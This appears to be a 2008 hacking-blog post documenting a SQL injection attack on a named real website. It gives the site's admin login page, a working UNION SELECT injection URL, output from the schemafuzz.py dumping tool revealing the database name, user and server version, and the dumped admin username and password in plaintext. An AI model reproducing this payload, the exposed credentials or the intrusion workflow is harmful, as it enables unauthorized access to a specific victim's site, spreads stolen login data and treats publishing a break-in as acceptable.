viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, October 14, 2008

[SQLi] http://www.racewithfaith.com

12:18 AM Posted by viperfx07 No comments


Tool: schemafuzz.py v5.0
Admin login page --> http://www.racewithfaith.com/admin/
Admi:n usr:pwd --> dana:vr00m
Dump
[+] URL:http://www.racewithfaith.com/newsdetail.php?ID=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 20:12:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: racewith_sited
User: racewith@server284.com
Version: 4.0.27-log
[+] Dumping data from database "racewith_sited" Table "login"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] dana:vr00m:vr00m:

[-] [20:12:16]
[-] Total URL Requests 3
[-] Done

0 comments:

Post a Comment